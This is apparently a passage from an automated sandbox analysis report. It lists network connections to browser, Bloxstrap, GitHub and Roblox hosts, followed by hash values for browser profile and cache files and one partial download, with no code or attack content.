| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 82.27.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.18.27.82:443 | r.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 2.18.27.82:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 8.8.8.8:53 | 76.27.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.0:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | bloxstrap.org | udp |
| US | 104.21.13.81:80 | bloxstrap.org | tcp |
| US | 104.21.13.81:80 | bloxstrap.org | tcp |
| US | 104.21.13.81:443 | bloxstrap.org | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 81.13.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ka-f.fontawesome.com | udp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 65.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | tcp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 1.169.217.172.in-addr.arpa | udp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| US | 8.8.8.8:53 | kit.fontawesome.com | udp |
| US | 104.18.40.68:443 | kit.fontawesome.com | tcp |
| US | 8.8.8.8:53 | 68.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| N/A | 127.0.0.1:60674 | tcp | |
| N/A | 127.0.0.1:60690 | tcp | |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 84.254.155.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bloxstrap.org | udp |
| US | 172.67.198.211:443 | bloxstrap.org | tcp |
| US | 8.8.8.8:53 | bloxstrap.org | udp |
| US | 8.8.8.8:53 | 211.198.67.172.in-addr.arpa | udp |
| US | 172.67.198.211:443 | bloxstrap.org | udp |
| US | 8.8.8.8:53 | kit.fontawesome.com | udp |
| US | 172.64.147.188:443 | kit.fontawesome.com | tcp |
| US | 8.8.8.8:53 | kit.fontawesome.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | kit.fontawesome.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | 188.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | support.mozilla.org | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| DE | 23.55.161.211:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 216.58.201.110:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 216.58.201.110:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r5---sn-aigzrn7l.gvt1.com | udp |
| GB | 173.194.5.234:443 | r5---sn-aigzrn7l.gvt1.com | tcp |
| US | 8.8.8.8:53 | r5.sn-aigzrn7l.gvt1.com | udp |
| US | 8.8.8.8:53 | r5.sn-aigzrn7l.gvt1.com | udp |
| GB | 173.194.5.234:443 | r5.sn-aigzrn7l.gvt1.com | udp |
| US | 8.8.8.8:53 | 211.161.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.5.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bloxstraplabs.com | udp |
| US | 104.21.66.155:443 | bloxstraplabs.com | tcp |
| US | 8.8.8.8:53 | 155.66.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | setup.rbxcdn.com | udp |
| NL | 18.239.94.78:443 | setup.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | clientsettingscdn.roblox.com | udp |
| NL | 18.239.18.114:443 | clientsettingscdn.roblox.com | tcp |
| US | 8.8.8.8:53 | 78.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.18.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | msedge.api.cdp.microsoft.com | udp |
| US | 4.151.228.221:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 221.228.151.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.f.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.18.190.81:80 | msedge.f.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 2.18.190.81:80 | msedge.f.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 81.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f426165d1e5f7df1b7a3758c306cd4ae |
| SHA1 | 59ef728fbbb5c4197600f61daec48556fec651c1 |
| SHA256 | b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841 |
| SHA512 | 8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6 |
\??\pipe\LOCAL\crashpad_2276_FCMSHDKHATKBFRKW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6960857d16aadfa79d36df8ebbf0e423 |
| SHA1 | e1db43bd478274366621a8c6497e270d46c6ed4f |
| SHA256 | f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32 |
| SHA512 | 6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | be539a897d77215b7c5679ceff3a95e3 |
| SHA1 | d41781ac3841c5adef68d860f0ccacef50271084 |
| SHA256 | d2ac6420b5f25adde98f7d4fc111226c7bf33f3f3921dccf676e46ad3012c0c8 |
| SHA512 | 39357caa779bb5ee1d56c315fca27d3c775dbbb083e6283b88e07bb39a6f9302915d585f3520346b11ad991277646a6aa2023ac775baaaf51a675eff85f43ce1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 50fb6774a8784db8cc7459e10de016a0 |
| SHA1 | 3885d7b0d857c16f15b5ac0299c0c659ecb245d0 |
| SHA256 | a4c013419e2e2c1c90036b9019e9bc8169e24eb2be381464653f8b6a98f6f05e |
| SHA512 | 96c7e0bd82849af69005e4fb5a489c2222b098aa9526c1b2d9e04e0ade38d29ee577fe010477f74c694a90202a05ab088add5e56392143b16c21681170970297 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b2246aab567fbfaf894eb6beed9164ea |
| SHA1 | bf9654d899a5d755b2afefbb1168e6dc9c2ad821 |
| SHA256 | 2240e6980207574047a2f87feb1a66e1f5d46da28baa36ac62577895e4b15439 |
| SHA512 | 74648d912fb25140e52c029d8d70f958e29013936e53a9c9ef389cc3d6d25b1747967c0ad180041512e28b36e95ed6b693b865f63b788025216364ff3c35f784 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | fb2f02c107cee2b4f2286d528d23b94e |
| SHA1 | d76d6b684b7cfbe340e61734a7c197cc672b1af3 |
| SHA256 | 925dd883d5a2eb44cf1f75e8d71346b98f14c4412a0ea0c350672384a0e83e7a |
| SHA512 | be51d371b79f4cc1f860706207d5978d18660bf1dc0ca6706d43ca0375843ec924aa4a8ed44867661a77e3ec85e278c559ab6f6946cba4f43daf3854b838bb82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | 710d7637cc7e21b62fd3efe6aba1fd27 |
| SHA1 | 8645d6b137064c7b38e10c736724e17787db6cf3 |
| SHA256 | c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b |
| SHA512 | 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | c3c0eb5e044497577bec91b5970f6d30 |
| SHA1 | d833f81cf21f68d43ba64a6c28892945adc317a6 |
| SHA256 | eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb |
| SHA512 | 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 76a3f1e9a452564e0f8dce6c0ee111e8 |
| SHA1 | 11c3d925cbc1a52d53584fd8606f8f713aa59114 |
| SHA256 | 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c |
| SHA512 | a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f6039c458041f7de1d08993b913f7a0b |
| SHA1 | a58e4e8a41a7f12b560a88602879a5c257211ec0 |
| SHA256 | 571011e2245fc52c3aee8a5aa87f1fb7533d679b37e538f1960e95754cb6aa4c |
| SHA512 | fa3956f30588915ea491b8bc266aa59a1750d3619f2a42ffbef7ec34790b8ee2d98475f183184b98283327210d0e44f3acae370b2cbc1221d3520d6dcd8180f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ee3242f4cf3c5b17bd251bb0b4bd8606 |
| SHA1 | 5df8afa4e58a66fa5e9b0e7803c4fe49d4f23181 |
| SHA256 | 45603f6c5ee1ea3ed0e5f347f5db13be5ccbdaed5877f3d68eadf33c91d72d02 |
| SHA512 | bfeae60644d3e3fc3033518df8b134cf8dc5edf1f980f1293622a34ba48f8956a050d88d1079eb7a1fe8443f3499f87ff8c7de634226b1254fb070d614d80635 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe599bc9.TMP
| MD5 | 71d827abfb7a2d1a59f7ffaf3670b4e1 |
| SHA1 | 447fba6acd9ddfa5f7d85dc56699a0ecf8d88cca |
| SHA256 | c54773558aae5e1a34b2bd166db466c7d734596b56c0ea25f961189d46c16753 |
| SHA512 | 3e8083f599be935e5f9c6b10664a91d2df7f66fdf0e7e728adfc7216e4d701bfce0eaa1eebb13a69a3fece441b85cf6c6dcbea6b9888e210be205c903b5bee48 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6cd3e1e961e5df27a70f2cc586e3b1df |
| SHA1 | c516bc812c7baa7629ffc284f773ac52046bf3e6 |
| SHA256 | f95b77311a76c01f981633eff7fdc3ac2d34a4d247c0472915892aeeb58216a2 |
| SHA512 | cd6ea6ccddf5d81f99fc19b7c6f272231fece5809e58dc4bb08f3f7699c50b1149bd14dc1ef5b192f9a91f5fa099659701e904d39453ce3cd8844950c89f5f79 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5cb5b2f72b082854d1372bdf40d83db0 |
| SHA1 | bd26ea3ab6f3e34be1566ca8b88f4c9f54354e65 |
| SHA256 | 0caffe2855be7fe8b1cd02581a1f3df24756e749dfb4911cfc8766653c202451 |
| SHA512 | b18a43ca336e2ff4d277d1f43dc7b0964365d530e439014352fa61b42bf8577ae508348271bb0c5b41b3ac389f7137c74d848d785873b8ccf9bea5c4ea9c46bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e3c17ea9622ea7d0c8812f3c61aa92ee |
| SHA1 | 3b4d3d62a3c52da0bd212f5f14f62329a03b095a |
| SHA256 | 3cbe0a1c4eec02ff22f01c5861d3f33e22c95537388cdd33ed1f4edf365d02bf |
| SHA512 | 4bc21de1cd9dd54ee48710c5c12d8af400b01960c15ccd24f57bb4f07cb9fa4471b953b68a1207ec6f5841e928976d40506acad7e00214d7cac462b016d6f76b |
C:\Users\Admin\Downloads\Unconfirmed 446235.crdownload
| MD5 | 3890622389fa64559eb3035aec65215f |
| SHA1 | ffb9810df58890a71d58e4f901a26e4cce50e7ed |
| SHA256 | 90842a4b97876d51d8471d78f6aea71aad0a83f30f7440d19fc9db96490354e2 |
| SHA512 | 28e514c587d29364b080ce426ed9bbe88818b5f34ee468f06b6cfa399fa181f3efd1a8d2172b8da76971a7e4b0f51056a88728bb08854d0ad7b5c3888d378e05 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fed907a3f9b5e21b7fb021ddb964174a |
| SHA1 | 7daec2a23b03c54091ac1a565a112105d1e23cb8 |
| SHA256 | 3988b75675a9070dc19d6f7171f30b21f96c3a32ae1a7428648bf548d5239e56 |
| SHA512 | c08e5f62b2d825e695bce77edef7c7a95e8f317dc0c538e3f12f2c5d1118370e6411a78d76a5bbfb3f283727ac9def830d5d493a0f5ae28357cffe1ddbd50b22 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\07937664-c20e-4d63-9ed2-9ece537296bc
| MD5 | 8d490baca6c6d9e45b76e931a019536f |
| SHA1 | 909f19920f66d6ce7d3b4ab0d669fa2eb08854a2 |
| SHA256 | dd2b27a6713cc39b347f2ae47310229d23430cc351fae37ea01da1f78280b761 |
| SHA512 | faeacf9419d8cc4772db9f8253d3958ba4ba37bff35cfa68f93ed347b389d1bd1c89d5bd378ebc295a46c6d987fe0e5fd12fb0e0e87c7d0a0160552e33427e84 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\a754488e-cd45-48a9-a8fe-33a069e25aef
| MD5 | f53ba5412041225ad42ccf9a7315abb1 |
| SHA1 | 30ae27f7f2c73d43b94a7e4e1de44971677edf35 |
| SHA256 | d322382bcba5a85235904a873804084b5d585f955e364eaf2f7da54b70618992 |
| SHA512 | 88750a1671812b33cfae413d9dde274314ef7c38595d30256a23088e458cdec6ae0d299746f8147d1e2da881b07f911c174ec942cafd99e75c769c07eba70855 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\425f8a7c-dfa7-4277-b4e9-1b24284608fa
| MD5 | edfb2e22858c772a73d0e7697b9ee166 |
| SHA1 | 3877a351cd872f1ded1490dfa2a358d3b8d1a255 |
| SHA256 | 965b793f7d6b0967846d8c129f6b23774fa99098fda5ca81ca053442ee3e9d56 |
| SHA512 | ce4aab1e1c7f82474e14585656a201407a95091c216a4fb366051fdeebeb5874a51fbb3279d5a5882a11315ba6bb12efcdef749473ee40b8866f6ed65b105d73 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | f46ac40dd64b18dc5b91678196c24df9 |
| SHA1 | c096ce9e8e91aaa6101c2d3570fc0814ef6959c5 |
| SHA256 | 38c335abe8dafaa46f2b029c108a2ac28482f0228053820e93eb7fe3b43358bc |
| SHA512 | 7d95d23fa52a6e3ef7735a20216a555fd96cbb2af268d5beafe7812d303f98cc3d9b07f30b8aa20ca47a0fc3cda6e87eb0a1a6fbf27fbc08ae1c15bf2c115102 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n4zftpal.default-release\activity-stream.discovery_stream.json
| MD5 | 97feecbcf377ab5d641df9b7410d2940 |
| SHA1 | 91dfbc3c86fe9214eb8168da498a4876580d9e34 |
| SHA256 | fdff7c7212825710a73328f450388423ce0fff90bcc8d93bc21b89bd38c5c077 |
| SHA512 | 83fe9de0cbf3d53fe645eb9048e943a43c1f9bcb286f294aee800dd215ae746fba3577d271072ab73659faef0efe49a2066b2b6a7e796b305bc2842c0eef5b4f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 30f9206622a2eec703d3dce2f6239603 |
| SHA1 | 5ae85485913e1dac0949539a3fa8ebab974c6c82 |
| SHA256 | 76ae52d406afb551bfaeef7823e01d9e54866d9ab1fa10ffd4b521b5c5570d7b |
| SHA512 | 4d3578f3f6c036fb34a5f87e19cd6629e5043273121d486a9d09ea7eabaaedac588d293f3630c54f8699c3b437a0562b9ff5599f19506ddbc1f3f36ca3ff1ebb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0d379e940e1eefb574f55623fdb81796 |
| SHA1 | 51dea84cf95570cee1080e4cf026b3e95b7156ec |
| SHA256 | 2f9c07577bc05d830f835f4b59fc7dc5ba1025ff506af4f77d277e4eefdc9848 |
| SHA512 | c1d228ab490ca2c33b3545581c9874c62c43629b2f49b09ea5d04c99edcb50b9c9feaff31b6c93eec415ef0f1f5fa28c2e7483f18eef45d060b7130bf28787f5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\AlternateServices.bin
| MD5 | 7abc613a657ade1371042fd4ecb25c0a |
| SHA1 | 73bd64d39d0bc4bdf5f5a978bc913c61df3b9b7b |
| SHA256 | d81a14d2e780424b1be8e603f5fcaafb7ed648ce97dded64eb19d202bf57beff |
| SHA512 | 752ac4cb9976934536c7b91d477478c5bbccbcd87cf96c6520e8dee4f500c8c30c74402d7b2a74b7c6751bffa5a9b8e4d6c609fd975e1fb371d8d256bbf1014e |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n4zftpal.default-release\cache2\entries\DBE483E26D273E0617100FEAA108686FBA377A76
| MD5 | 807031f5197f382a98c4f180b10812bb |
| SHA1 | 57ae78e313dd2a3d49feca067c6967f5165c8f55 |
| SHA256 | 2dd9191630444a9e468067d13836f4d2c534853484ca7f87cda21678bb3b073a |
| SHA512 | 8526ee3d10a33c3e244d0cf3467712d97857c6d92d9219b1b1e1d294c29118bfb2e927112992f7a554bcc898ad7e8a8c643e76e1632fb8a714283356be19b32a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n4zftpal.default-release\cache2\entries\8C1C10DD2F914C8E0F9F1E5AB15B8C75388A977C
| MD5 | 6ccafded05a60d6daa07232143ed4afa |
| SHA1 | 9031ba873779393d2bca9d4f864f3f11931ec439 |
| SHA256 | a0d2a59c540d994f576bdfbb640904ec2e3c005525e4a3822a7ef4e3c5c273a4 |
| SHA512 | ebbfe0a91ea26213c359fed1c54db48f0745df31eeb596be02131d6dd4b4084654b789cb8f9f47c12a58990935dac8e6d202a4c9cef950f1b4c7da85ba51725d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n4zftpal.default-release\cache2\entries\52E3564431325ADAAABB6F6074BB3A3F92D3A22B
| MD5 | 546bb4a08955c5640896aa35b47c90c0 |
| SHA1 | 5ead92ad89809ab42cc10b6e9f5ade3bbcd99570 |
| SHA256 | ed1f482f235c611b751d18ba8c4a84916f94d3d63e61812270f1b3d39149270d |
| SHA512 | e5be4409012bca4fa5fa306a80661b1cf19c2c65d0be6c500a5ed55e51b6e322633ba04fa49110fe4fdc73cb2fde53cafa36ec95b319615374767abe2155b542 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e7677723a9339ab039d8e14aa2f27774 |
| SHA1 | 993e7b22e8d34358b05f86def38feb0816d5695e |
| SHA256 | 361760f4c53bfffa767b11d6eeb6221f9f68abd4bdd5dae981bc44a09174b49a |
| SHA512 | 560d6c400118411140774e7f8729d332761369f476ff760425cd2eabe9f0b6adb69bfb472a3bca0e79bb63ffd1cbabf6e632356e72560947c75fa2cfe9e9d9cf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | e620c418baf9147c6565c655a5f8ab51 |
| SHA1 | fa85cf180383bc86f48498c9343ce71e47aedd71 |
| SHA256 | 6bd36983a6736679c653c7389f2a21a6bab69e2e5bab1704ecb6b16aa3b9905f |
| SHA512 | 3ebadd9d1e80c5ecf4b1e0ecc902592df286770b9784d959642b4fa96d02490c089a27195fdd814b60fac3a62a682596c401e9e2a181ac6ac8800f42d0d8e7b6 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n4zftpal.default-release\thumbnails\4db11a9bb2b730490651e249097ebc4d.png
| MD5 | 81fa95d39d9e7db85fd36faa2619ea6c |
| SHA1 | 57adbb455f7782ba7633ccbdb2aeaf4e79e3b467 |
| SHA256 | 7d9158055b2a942e383a9150be82d1f614a396fcd99907a394fed651dc47a24b |
| SHA512 | 708b4c5687917123403b80ae8c85dbd59f71479e82cdc5cfb3b5d18443abd60828af3e640d18ca98611106c332fb2e0f9d7dfd2defe04c5c8546f17df07ce214 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\sessionstore-backups\recovery.baklz4
| MD5 | df139034f1326de092dbe8d16a9266dd |
| SHA1 | a2ed4961e1948e2820bb6165008d09c762684600 |
| SHA256 | 325834af36f55c63005a6e6e73fae7491f0bfbe1a8cd3c3a8665b3c9ee59973c |
